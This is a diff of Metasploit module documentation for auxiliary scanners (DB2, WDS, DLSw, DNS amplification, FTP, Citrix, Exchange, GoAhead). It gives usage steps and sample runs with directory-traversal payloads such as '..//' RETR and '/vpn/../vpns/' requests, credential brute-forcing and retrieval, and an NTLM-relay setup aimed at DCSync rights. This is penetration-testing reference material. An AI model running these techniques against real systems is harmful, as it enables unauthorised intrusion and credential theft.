+This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_auth)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_auth`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+    ```
+    msf > use auxiliary/scanner/db2/db2_auth
+    msf auxiliary/scanner/db2/db2_auth) > show options
+    msf auxiliary/scanner/db2/db2_auth) > set USERNAME db2inst1
+    msf auxiliary/scanner/db2/db2_auth) > set PASSWORD db2pass
+    msf auxiliary(scanner/db2/db2_auth) > set DATABASE testdb
+    msf auxiliary/scanner/db2/db2_auth) > set RHOST 172.17.0.2
+    msf auxiliary/scanner/db2/db2_auth) > run
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2inst1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:dasusr1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2fenc1@testdb (Incorrect: )
+      [*] 172.17.0.2:50000      - Login Successful: db2inst1:db2pass
+      [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+      [*] Auxiliary module execution completed
+    ```

documentation/modules/auxiliary/scanner/db2/db2_version.md

@@ -0,0 +1,27 @@
+## Vulnerable Application
+
+This module queries a DB2 instance information.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_version)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_version`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+  ```
+  msf > use auxiliary/scanner/db2/db2_version
+  msf auxiliary(scanner/db2/db2_version) > show options
+  msf auxiliary(scanner/db2/db2_version) > set DATABASE testdb
+  msf auxiliary(scanner/db2/db2_version) > set RHOSTS 172.17.0.2
+  msf auxiliary(scanner/db2/db2_version) > run
+    [+] 172.17.0.2:50000      - 172.17.0.2:50000 DB2 - Platform: QDB2/LINUXX8664, Version: SQL11050, Instance: db2inst1, Plain-Authentication: OK
+    [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/db2/discovery.md

@@ -1,5 +1,5 @@
 
-## About
+## Description
 
 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`
 
-
 ## Scenarios
-- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run

documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md

@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/dcerpc/windows_deployment_services) and pull request [PR #1420](https://github.com/rapid7/metasploit-framework/pull/1420).
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dcerpc/windows_deployment_services`
+  3. set RHOST [ip]
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Windows Server 2008 R2 X64
+
+  ```
+  msf > use modules/auxiliary/scanner/dcerpc/windows_deployment_services
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > show options
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > set RHOST 192.168.5.1
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > run
+
+    [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ...
+    [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040]
+    [*] Sending X64 Client Unattend request ...
+    [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt
+    [+] Retrieved wds credentials for X64
+    [*] Sending X86 Client Unattend request ...
+    [*] Sending IA64 Client Unattend request ...
+
+      Windows Deployment Services
+      ===========================
+
+      Architecture  Type  Domain        Username  Password
+      ------------  ----  ------        --------  --------
+      X64           wds   Fabrikam.com  username  my_password
+
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/discovery/empty_udp.md

@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+Detect UDP services that reply to empty probes.
+
+More information can be found on the [Rapid7 blog page](https://blog.rapid7.com/2014/10/03/adventures-in-empty-udp-scanning/)
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/discovery/empty_udp`
+3. Do: `set RHOSTS [ip]`
+4. Do: `set RPORT [port]`
+5. Do: `run`
+
+## Scenarios
+
+### A run against Windows XP (X64) using Kali Linux 2019.3
+
+  ```
+  msf auxiliary(scanner/dns/dns_amp) > use auxiliary/scanner/discovery/empty_udp
+  msf auxiliary(scanner/discovery/empty_udp) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/discovery/empty_udp) > set RPORT 135
+    RPORT => 135
+  msf auxiliary(scanner/discovery/empty_udp) > run
+    [*] Sending 1032 empty probes to 1.1.1.1->1.1.1.1 (1 hosts)
+    [+] Received #52 from #:135:#1095/udp
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.md

@@ -0,0 +1,26 @@
+## Vulnerable Application
+
+This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/dlsw/dlsw_leak_capture`
+3. Do: `set RHOSTS [ip]`
+4. Do: `run`
+
+## Scenarios
+
+### IOS version 12.4(8) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/dlsw/dlsw_leak_capture
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > set RHOSTS 192.168.0.1
+    RHOSTS => 192.168.0.1
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > run
+    [*] 192.168.0.1:2067      - Checking for DLSw information disclosure (CVE-2014-7992)
+    [+] 192.168.0.1:2067      - Vulnerable to DLSw information disclosure; leaked 72 bytes
+    [*] 192.168.0.1:2067      - DLSw leaked data stored in /root/.msf4/loot/20191124231804_default_192.168.0.1_dlsw.packet.cont_518857.bin
+    [*] 192.168.0.1:2067      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dns/dns_amp.md

@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplification attack against a third party.
+
+BIND 9.4.1-P1: [source](ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz)
+Ubuntu 7.10: [Gutsy Gibbon](http://old-releases.ubuntu.com/releases/7.10/)
+
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dns/dns_amp`
+  3. Do: `set DOMAINNAME [domain]`
+  4. Do: `set RHOST [ip]`
+  5. Do: `run`
+
+## Scenarios
+
+### A run on Ubuntu 7.10 (Gutsy Gibbon) and BIND 9.4.1-P1
+
+  ```
+  msf > use modules/auxiliary/scanner/dns/dns_amp
+  msf auxiliary(scanner/dns/dns_amp) > set DOMAINNAME domain.com
+    DOMAINNAME => domain.com
+  msf auxiliary(scanner/dns/dns_amp) > set RHOSTS 192.168.10.254
+    RHOSTS => 192.168.10.254
+  msf auxiliary(scanner/dns/dns_amp) > run
+    [*] Sending DNS probes to 192.168.10.254->192.168.10.254 (1 hosts)
+    [*] Sending 70 bytes to each host using the IN ANY domain.com request
+    [+] 192.168.10.254:53 - Response is 374 bytes [5.34x Amplification]
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.md

@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.
 
 By default, anonymous access is allowed by the FTP server.
 
-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:
 
@@ -22,6 +22,6 @@ The FTP server IP address.
 
 The file you wish to download. Assume this path starts from C:\
 
-## Demonstration
+## Scenarios
 
 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)

documentation/modules/auxiliary/scanner/ftp/konica_ftp_traversal.md

@@ -0,0 +1,29 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`.
+
+Link to Konica Minolta FTP Utility 1.00 software download [Exploit-DB](https://www.exploit-db.com/apps/6388a2ae7dd2965225b3c8fad62f2b3b-ftpu_10.zip)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/konica_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Konica Minolta FTP Utility 1.00 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/konica_ftp_traversal
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  set PATH ../../WINDOWS/win.ini
+    PATH => ../../WINDOWS/win.ini
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > run
+  [+] 1.1.1.1:21      - Stored ../../WINDOWS/win.ini to /root/.msf4/loot/20191122042114_default_1.1.1.1_konica.ftp.data_003802.ini
+  [*] 1.1.1.1:21      - Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.md

@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`
+
+Linked to software download [Exploit-DB](https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/pcman_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### PCMan FTP Server 2.0.7 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/pcman_ftp_traversal
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > show options
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set RHOST 1.1.1.1
+    rhost => 1.1.1.1
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set PATH WINDOWS\\win.ini
+    PATH => WINDOWS\win.ini
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > run    
+    [+] 192.168.2.252:21      - Stored WINDOWS\win.ini to /root/.msf4/loot/20191120201523_default_1.1.1.1_pcman.ftp.data_069450.ini
+    [*] 192.168.2.252:21      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+### Manual Exploitation
+
+  ```
+  2019/11/20 [12:46] (00588) 1.1.1.2> User connecting from 1.1.1.2
+
+  2019/11/20 [12:46] (00588) 1.1.1.2> USER anonymous
+  2019/11/20 [12:46] (00588) Anonymous> 331 User name okay, need password.
+
+  2019/11/20 [12:46] (00588) Anonymous> PASS *****
+  2019/11/20 [12:46] (00588) Anonymous> 230 User logged in
+
+  2019/11/20 [12:46] (00588) Anonymous> PASV
+  2019/11/20 [12:46] (00588) Anonymous> 227 Entering Passive Mode (1.1.1.1,8,1)
+
+  2019/11/20 [12:46] (00588) Anonymous> RETR ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//WINDOWS\win.ini
+  2019/11/20 [12:46] (00588) Anonymous> 150 File status okay; Open data connection.
+
+  2019/11/20 [12:46] (00588) Anonymous> 226 Data Sent okay.
+
+  2019/11/20 [12:46] (00588) Anonymous> User Disconnected.
+  ```

documentation/modules/auxiliary/scanner/http/advantech_webaccess_login.md

@@ -1,9 +1,7 @@
-## Description
+## Vulnerable Application
 
 This module allows you to authenticate to Advantech WebAccess.
 
-## Vulnerable Application
-
 This module was specifically tested on versions 8.0, 8.1, and 8.2:
 
 **8.2 Download**
@@ -23,7 +21,6 @@ Note:
 By default, Advantech WebAccess comes with a built-in account named ```admin```, with a blank
 password.
 
-
 ## Verification Steps
 
 1. Make sure Advantech WebAccess is up and running
@@ -34,6 +31,6 @@ password.
 6. ```run```
 7. You should see that the module is attempting to log in.
 
-## Demo
+## Scenarios
 
 ![webaccess_login_demo](https://cloud.githubusercontent.com/assets/1170914/22352301/26549236-e3e1-11e6-9710-506166a8bee3.gif)

documentation/modules/auxiliary/scanner/http/cisco_firepower_download.md

@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 This module exploits a vulnerability found in Cisco Firepower Management console. A logged in
 user can abuse the report viewing feature to download an arbitrary file. Authentication is
 required to exploit this vulnerability.
 
-
-## Vulnerable Application
-
 This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during
 development. To test, you may download the virtual appliance here:
 
@@ -26,6 +25,6 @@ admin:Admin123 by default:
 If the file is found, it will be saved in the loot directory. If not found, the module should
 print an error indicating so.
 
-## Demo
+## Scenarios
 
 ![cisco_download_demo](https://cloud.githubusercontent.com/assets/1170914/21782825/78ada38e-d67a-11e6-9b7b-c7b8e2956fba.gif)

documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md

@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>

documentation/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.md

@@ -9,7 +9,7 @@ The device has at least two (2) users - admin and user. Due to an access control
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot

documentation/modules/auxiliary/scanner/http/dir_scanner.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 This module scans one or more web servers for interesting directories that can be further explored.
 

documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md

@@ -0,0 +1,37 @@
+## Vulnerable Application
+
+  * Microsoft Exchange 2013 and 2016
+  * Tested on Exchange 2016
+  * Usage:
+    * Download and install Exchange Server within a Windows domain
+    * Setup a mailbox with a domain user
+    * Run the module
+    * Relay the NTLM authentication to the DC
+
+## Verification Steps
+
+  Example steps:
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/scanner/http/exchange_web_server_pushsubscription```
+  3. Do: ```set attacker_url <url>```
+  4. Do: ```set rport <target_port>```
+  5. Do: ```set rhost <target_IP>```
+  6. Do: ```set domain <domain_name>```
+  7. Do: ```set password <user_pass>```
+  8. Do: ```set username <user_pass>```
+  9. Do: ```run```
+
+## Options
+
+  **The ATTACKER_URL option**
+
+  This option should contain a URL under the attacker's control. This is where the Exchange will try to authenticate.
+
+  **The PASSWORD option**
+  This can be either the password or the NTLM hash of any domain user with a mailbox configured on Exchange.
+
+## Scenarios
+
+  This module can be used to make a request to the Exchange server and force it to authenticate to a URL under our control. 
+  An example scenario is that when this module is combined with an NTLM relay attack, if the Exchange server has the necessary permissions it is possible to grant us DCSync rights.

documentation/modules/auxiliary/scanner/http/git_scanner.md

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This module looks for a `.git` folder on a web server, and attempts to read the `config` and `index` files to gather information about the repo.
+
+### Environment
+
+On Kali, we can clone metasploit into the apache folder to create a vulnerable environment.
+
+```
+root@kali:~# cd /var/www/html/
+root@kali:/var/www/html# git clone https://github.com/rapid7/metasploit-framework.git
+Cloning into 'metasploit-framework'...
+remote: Enumerating objects: 49, done.
+remote: Counting objects: 100% (49/49), done.
+remote: Compressing objects: 100% (41/41), done.
+remote: Total 509870 (delta 18), reused 20 (delta 8), pack-reused 509821
+Receiving objects: 100% (509870/509870), 415.71 MiB | 8.61 MiB/s, done.
+Resolving deltas: 100% (372897/372897), done.
+Updating files: 100% (10064/10064), done.
+root@kali:/var/www/html# service apache2 start
+```
+
+## Verification Steps
+
+  1. Install a git repo in a web server
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/git_scanner```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```run```
+  6. You should get information about the git repo
+
+## Options
+
+  **GIT_CONFIG**
+
+  Attempts to locate the `config` file, which may contain useful information.  Default is `true`.
+
+  **GIT_INDEX**
+
+  Attempts to locate the `index` file, which identifies the git version and number of files.  Default is `true`.
+
+  **TARGETURI**
+
+  Where the `.git` folder is located.  Default is `/.git/`
+
+  **UserAgent**
+
+  The user agent to emulate.  Default is `git/1.7.9.5`.
+
+## Scenarios
+
+### Metasploit git on Kali
+
+```
+msf5 > use auxiliary/scanner/http/git_scanner 
+msf5 auxiliary(scanner/http/git_scanner) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(scanner/http/git_scanner) > set TARGETURI /metasploit-framework/.git/
+TARGETURI => /metasploit-framework/.git/
+msf5 auxiliary(scanner/http/git_scanner) > run
+
+[+] http://127.0.0.1/metasploit-framework/.git/ - git repo (version 2) found with 10064 files
+[+] http://127.0.0.1/metasploit-framework/.git/config - git config file found
+[+] Saved file to: /root/.msf4/loot/20191007202314_default_127.0.0.1_config_236738.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/scanner/http/glassfish_traversal.md

@@ -9,7 +9,7 @@ Related links :
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 * http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1
 
-## Verification
+## Verification Steps
 
   1. Start msfconsole
   2. Do: ```use auxiliary/scanner/http/glassfish_traversal```

documentation/modules/auxiliary/scanner/http/goahead_traversal.md

@@ -0,0 +1,154 @@
+## Vulnerable Application
+
+GoAhead web server by EmbedThis versions from 3.0.0 through 3.4.1 contains a directory traversal vulnerability.
+To exploit this vulnerability, each `../` must be matched with a `.x/`, with each being grouped together.
+For instance a depth of 2 will look as follows: `../../.x/.x/foobar`.
+
+An excellent writeup is available on [PacketStorm](https://packetstormsecurity.com/files/131156/GoAhead-3.4.1-Heap-Overflow-Traversal.html).
+
+### Install on Kali
+
+Since `goahead` is available on Git, we can simply download the vulnerable version, compile, and run it.
+
+```
+root@kali:/tmp# wget https://github.com/embedthis/goahead/archive/v3.4.1.tar.gz
+--2019-10-07 20:42:28--  https://github.com/embedthis/goahead/archive/v3.4.1.tar.gz
+Resolving github.com (github.com)... 192.30.253.113
+Connecting to github.com (github.com)|192.30.253.113|:443... connected.
+HTTP request sent, awaiting response... 302 Found
+Location: https://codeload.github.com/embedthis/goahead/tar.gz/v3.4.1 [following]
+--2019-10-07 20:42:29--  https://codeload.github.com/embedthis/goahead/tar.gz/v3.4.1
+Resolving codeload.github.com (codeload.github.com)... 192.30.253.120
+Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: unspecified [application/x-gzip]
+Saving to: ‘v3.4.1.tar.gz’
+
+v3.4.1.tar.gz                                   [     <=>                                                                                 ]   5.95M  6.35MB/s    in 0.9s    
+
+2019-10-07 20:42:30 (6.35 MB/s) - ‘v3.4.1.tar.gz’ saved [6234594]
+
+root@kali:/tmp# tar -zxf v3.4.1.tar.gz 
+root@kali:/tmp# cd goahead-3.4.1/
+root@kali:/tmp/goahead-3.4.1# make
+make --no-print-directory -f projects/goahead-linux-default.mk all
+      [Info] Use make SHOW=1 to trace executed commands.
+      [Copy] build/linux-x64-default/bin/ca.crt
+      [Copy] build/linux-x64-default/inc/osdep.h
+      [Copy] build/linux-x64-default/inc/est.h
+   [Compile] build/linux-x64-default/obj/estLib.o
+      [Link] build/linux-x64-default/bin/libest.so
+      [Copy] build/linux-x64-default/inc/goahead.h
+      [Copy] build/linux-x64-default/inc/js.h
+   [Compile] build/linux-x64-default/obj/action.o
+   [Compile] build/linux-x64-default/obj/alloc.o
+   [Compile] build/linux-x64-default/obj/auth.o
+   [Compile] build/linux-x64-default/obj/cgi.o
+   [Compile] build/linux-x64-default/obj/crypt.o
+   [Compile] build/linux-x64-default/obj/file.o
+   [Compile] build/linux-x64-default/obj/fs.o
+   [Compile] build/linux-x64-default/obj/http.o
+   [Compile] build/linux-x64-default/obj/js.o
+   [Compile] build/linux-x64-default/obj/jst.o
+   [Compile] build/linux-x64-default/obj/options.o
+   [Compile] build/linux-x64-default/obj/osdep.o
+   [Compile] build/linux-x64-default/obj/rom-documents.o
+   [Compile] build/linux-x64-default/obj/route.o
+   [Compile] build/linux-x64-default/obj/runtime.o
+   [Compile] build/linux-x64-default/obj/socket.o
+   [Compile] build/linux-x64-default/obj/upload.o
+   [Compile] build/linux-x64-default/obj/est.o
+   [Compile] build/linux-x64-default/obj/matrixssl.o
+   [Compile] build/linux-x64-default/obj/nanossl.o
+   [Compile] build/linux-x64-default/obj/openssl.o
+      [Link] build/linux-x64-default/bin/libgo.so
+   [Compile] build/linux-x64-default/obj/goahead.o
+      [Link] build/linux-x64-default/bin/goahead
+   [Compile] build/linux-x64-default/obj/test.o
+      [Link] build/linux-x64-default/bin/goahead-test
+   [Compile] build/linux-x64-default/obj/gopass.o
+      [Link] build/linux-x64-default/bin/gopass
+
+You can now install via "sudo make  install" or run GoAhead via: "sudo make run"
+To run locally, put linux-x64-default/bin in your path
+
+root@kali:/tmp/goahead-3.4.1# build/linux-x64-default/bin/goahead --verbose --home test /var/www/html/
+```
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/goahead_traversal```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```set depth [number]```
+  6. Do: ```run```
+  7. You should get the file contents.
+
+## Options
+
+  **DEPTH**
+
+  The depth to traverse from the webroot.  This does not need to be exact, overshooting (using a number larger than needed)
+  will still result in the file being obtained.  Default is `5`
+
+  **FILEPATH**
+
+  The path to the file to read.  Default is `/etc/passwd`.
+
+## Scenarios
+
+### GoAhead 3.4.1 on Kali
+
+Install from the instructions at the top of this document.
+
+```
+msf5 > use auxiliary/scanner/http/goahead_traversal 
+msf5 auxiliary(scanner/http/goahead_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(scanner/http/goahead_traversal) > set depth 5
+depth => 5
+msf5 auxiliary(scanner/http/goahead_traversal) > run
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+
+[+] File saved in: /root/.msf4/loot/20191007213309_default_127.0.0.1_goahead.traversa_324804.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Server Logs
+
+When setting the server to verbose output, the following is shown during exploitation:
+
+```
+# build/linux-x64-default/bin/goahead --verbose --home test /var/www/html/
+goahead: 2: Configuration for Embedthis GoAhead
+goahead: 2: ---------------------------------------------
+goahead: 2: Version:            3.4.1
+goahead: 2: BuildType:          Debug
+goahead: 2: CPU:                x64
+goahead: 2: OS:                 linux
+goahead: 2: Host:               127.0.1.1
+goahead: 2: Directory:          /var/www/html/goahead-3.4.1/test
+goahead: 2: Documents:          /var/www/html/
+goahead: 2: Configure:          me -d -q -platform linux-x86-default -configure . -with est -gen make
+goahead: 2: ---------------------------------------------
+goahead: 2: Started http://*:80
+goahead: 2: Started https://*:443
+goahead: 2: GET ../../../../../.x/.x/.x/.x/.x/etc/passwd HTTP/1.1
+```

documentation/modules/auxiliary/scanner/http/http_header.md

@@ -22,7 +22,7 @@ Module options (auxiliary/scanner/http/http_header):
    Name         Current Setting                                                        Required  Description
    ----         ---------------                                                        --------  -----------
    HTTP_METHOD  HEAD                                                                   yes       HTTP Method to use, HEAD or GET (Accepted: GET, HEAD)
-   IGN_HEADER   Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges  yes       List of headers to ignore, seperated by comma
+   IGN_HEADER   Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges  yes       List of headers to ignore, separated by comma
    Proxies                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS                                                                              yes       The target address range or CIDR identifier
    RPORT        80                                                                     yes       The target port (TCP)

documentation/modules/auxiliary/scanner/http/http_put.md

@@ -11,7 +11,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```
 
-## Options 
+## Options
 
 ### ACTION
 

documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md

@@ -1,13 +1,15 @@
-
-## Microsoft IIS shortname vulnerability scanner
-
